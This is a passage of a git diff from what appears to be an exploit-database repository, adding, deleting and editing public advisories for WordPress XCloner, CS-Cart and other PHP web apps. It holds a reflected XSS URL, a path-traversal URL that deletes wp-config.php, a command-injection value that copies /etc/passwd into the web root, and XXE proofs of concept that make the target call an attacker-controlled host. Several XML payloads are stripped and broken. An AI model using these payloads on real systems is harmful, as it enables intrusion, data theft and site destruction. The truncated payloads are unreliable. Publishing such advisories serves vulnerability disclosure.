is vulnerable; other versions may also be affected. - -http://www.example.com/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/40739.txt b/platforms/php/webapps/40739.txt deleted file mode 100755 index e24c40da7..000000000 --- a/platforms/php/webapps/40739.txt +++ /dev/null @@ -1,47 +0,0 @@ -# Exploit Title: XCloner <= 3.1.5 Multiple Vulnerabilities -# Google Dork: inurl:"plugins/xcloner-backup-and-restore/readme.txt" -site:wordpress.org -# Date: 08/11/2016 -# Exploit Author: Felipe Molina (@felmoltor) -# Vendor Homepage: www.xcloner.com -# Software Link: https://es.wordpress.org/plugins/xcloner-backup-and-restore/ -# Version: 3.1.5 and lower -# Tested on: Ubuntu 14 and PHP 5 -# Product description: XCloner is a plugin for wordpress and Joomla! with more than 70.000 active installations to easily execute backup and restores on your CMS. - -Authenticated DoS or CMS destruction --------------------------------------------------------- -Summary: XClonner does not check the file path is going to unlink -after unlinking it. Therefore, a deletion of random files on the file -system accesible by the web process is possible. A destruction of the -blog can be achieved with the following PoC: - -1. Authenticate to wordpress with an administrator -2. Access to XCloner to the following URL: -* http://example.com/wp-admin/plugins.php?page=xcloner_show&option=xcloner&task=cron_delete&fconfig=../../../../wp-config.php -3. See how your wordpress stops working. -4. In case that the web server is running with higher privileges, a more destructive action would be possible deleting O.S. critical files. - -Authenticated RCE ----------------------------- -Summary: -XCloner does not filter the command line is being used to execute the -tar of a backup. -Random shell commands can be injected in this field. -A file creation in the file system can be achieved with the following PoC: - -1. Authenticate to wordpress with an administrator -2. Access to Plugins -> XCloner -3. Navigate to Administration -> Configuration -> General -4. In "Server Use Options" set the field "Tar path or command" with -the following value: -* tar -h; cp /etc/passwd ./passwd.txt ; tar -k -5. Now go to "Actions -> Generate Backup" -6. Find the file passwd.txt in the wordpress root folder -7. Navigate to http://example.com/passwd.txt to see the file /etc/passwd -8. Looking at the code, the field to specify the mysqldump command -"Mysqldump path or command" is also injectable, but I have not a PoC -for it. - --- - -Felipe Molina de la Torre (@felmoltor) \ No newline at end of file diff --git a/platforms/php/webapps/40770.txt b/platforms/php/webapps/40770.txt new file mode 100755 index 000000000..bf750b2de --- /dev/null +++ b/platforms/php/webapps/40770.txt @@ -0,0 +1,107 @@ +# Software : CS-Cart <= 4.3.10 +# Vendor home : cs-cart.com +# Author : Ahmed Sultan (@0x4148) +# Home : 0x4148.com +# Email : 0x4148@gmail.com +# Tested on : apache on windoes with php 5.4.4 / apache on linux with php <5.2.17 + +From vendor site +CS-Cart is an impressive platform for users to any level of eCommerce +experience. +With loads of features at a great price, CS-Cart is a great shopping cart +solution that will quickly enable your online store to do business. + +XXE I : Twimgo addon +app/addons/twigmo/Twigmo/Api/ApiData.php +Line 131 +public static function parseDocument($data, $format = +TWG_DEFAULT_DATA_FORMAT) +{ +if ($format == 'xml') { +$result = @simplexml_load_string($data, 'SimpleXMLElement', +LIBXML_NOCDATA); +return self::getObjectAsArray($result); +} elseif ($format == 'jsonp') { +return (array) json_decode($data, true); +} elseif ($format == 'json') { +return (array) json_decode($data, true); +} + +return false; +} +POC +]> + +Ahmed sultan (0x4148) +&xxe; + +"; +echo rawurlencode(base64_encode($xml)); +?> + +change YOUR_HOST to your server address , use the output in the following +POST request +Action -> HOST/cs-cart/index.php?dispatch=twigmo.post +Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml +a GET request will be sent to your webserver from the vulnerable host +indicating successful attack +(Require twimgo addon to be activated) + +XXE II : Amazon payment +File : app/payments/amazon/amazon_callback.php +Line 16 +use Tygh\Registry; + +if (!defined('BOOTSTRAP')) { die('Access denied'); } + +include_once (Registry::get('config.dir.payments') . +'amazon/amazon_func.php'); + +fn_define('AMAZON_ORDER_DATA', 'Z'); + +if (!empty($_POST['order-calculations-request'])) { +$xml_response = $_POST['order-calculations-request']; + +} elseif (!empty($_POST['NotificationData'])) { +$xml_response = $_POST['NotificationData']; +} + +if (!empty($_POST['order-calculations-error'])) { +// Process the Amazon callback error +$xml_error = $_POST['order-calculations-error']; +$xml = @simplexml_load_string($xml_error); +if (empty($xml)) { +$xml = @simplexml_load_string(stripslashes($xml_error)); +} + +// Get error message +$code = (string) $xml->OrderCalculationsErrorCode; +$message = (string) $xml->OrderCalculationsErrorMessage; + +POC +sending POST request to +app/payments/amazon/amazon_checkout.php +setting POST parameter order-calculations-request to + +]> + +Ahmed sultan (0x4148) +%26xxe%3b + + +Will result in an GET request to your host from the vulnerable machine , +indicating successful attack +(Require amazon payment method to be activated) + + +Disclosure time line +10/11 vulnerabilities reported to the vendor +11/11 Vendor asked for extra details +12/11 Vendor acknowledged the validity of vulnerabilities and asked for +time to fix +16/11 vendor permitted public release + +Reference +https://0x4148.com/2016/11/10/cs-cart/ \ No newline at end of file diff --git a/platforms/php/webapps/5309.txt b/platforms/php/webapps/5309.txt index 2f37c652a..dbadc9621 100755 --- a/platforms/php/webapps/5309.txt +++ b/platforms/php/webapps/5309.txt @@ -111,7 +111,7 @@ POST parameter "bolini_searchengine46Search". Example: -bolini_searchengine46Search = '> +bolini_searchengine46Search = '> --------------------------------------------------------------------